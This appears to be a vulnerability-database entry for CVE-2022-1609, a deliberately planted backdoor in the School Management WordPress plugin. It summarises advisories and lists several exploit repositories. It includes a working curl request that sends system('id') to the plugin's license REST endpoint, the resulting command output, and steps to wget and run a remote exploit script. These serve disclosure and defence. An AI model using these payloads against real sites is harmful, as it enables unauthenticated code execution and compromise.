Published: 16/01/2024 Updated: 22/01/2024

CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9

VMScore: 0

The School Management WordPress plugin prior to 9.9.7 contains an obfuscated backdoor injected in it's license checking code that registers a REST API handler, allowing an unauthenticated malicious user to execute arbitrary PHP code on the site.

Vulnerable Product	Search on Vulmon	Subscribe to Product
weblizar school management

CVE-2022-1609 WordPress Weblizar后门

CVE-2022-1609 CVE-2022-1609 WordPress Weblizar后门 curl -s -d 'blowfish=1' -d "blowf=system('id');" 'localhost:8888/wp-json/am-member/license' uid=33(www-data) gid=33(www-data) groups=33(www-data)

Remote Code Execution vulnerability on WordPress plugin School Management

WP-school-management-RCE CVE-2022-1609 Remote Code Execution vulnerability on WordPress plugin School Management Reference Wpscan

Exploit for CVE-2022-1609 WordPress Weblizar Backdoor.

cve-2022-1609-exploit Exploit for CVE-2022-1609 WordPress Weblizar Backdoor

Bash poc for CVE-2022-1609 WordPress Weblizar Backdoor

CVE-2022-1609 Bash poc for CVE-2022-1609 WordPress Weblizar Backdoor How to install ? wget rawgithubusercontentcom/0xSojalSec/CVE-2022-1609/main/exploitsh chmod +x exploitsh /exploitsh How to use it ? GH0ST_3exP10it$ /exploitsh 127001:8080 [+] Targeting 127001:8080 $ id uid=33(www-data) gid=33(www-dat

CWE-94 https://wpscan.com/vulnerability/e2d546c9-85b6-47a4-b951-781b9ae5d0f2/https://nvd.nist.gov https://github.com/savior-only/CVE-2022-1609

CVE-2022-1609

Vulnerability Summary

Vulnerability Trend

Github Repositories

References

Vulmon Search

About

Products

Connect